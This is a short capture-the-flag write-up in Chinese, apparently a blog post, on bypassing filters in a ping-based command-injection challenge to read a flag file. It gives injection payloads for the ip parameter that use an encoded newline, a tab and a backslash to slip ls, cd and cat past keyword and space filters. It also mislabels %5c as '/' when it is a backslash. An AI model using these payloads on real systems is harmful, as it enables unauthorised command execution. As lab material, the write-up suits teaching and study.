-
观察源代码
- 代码里面可以发现过滤了运算符、目录分隔符、分号、空格还有一些关键字也被过滤了
-
判断是Windows还是Linux
- 源代码中有
说明是Linuxping -c 4
- 源代码中有
-
查看有哪些文件
- 用换行符的url值(%0a)代替分号
- 注意:在url中输入
-
?ip=127.0.0.1%0a#
-
打开flag文件
- 打开flag_is_here的文件夹,查看里面有哪些文件
- 由于flag被过滤,就需要用到tab的url值(%09)补全
-
?ip=127.0.0.1%0als%09*_is_here
- cat这个php文件
- 由于cat被过滤,且 / 也被过滤了,所以用 / 的url值代替(%5c)
-
?ip=127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_101694095171.php# - 打开网页源代码查看(Ctrl+U)
- 成功获取flag
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
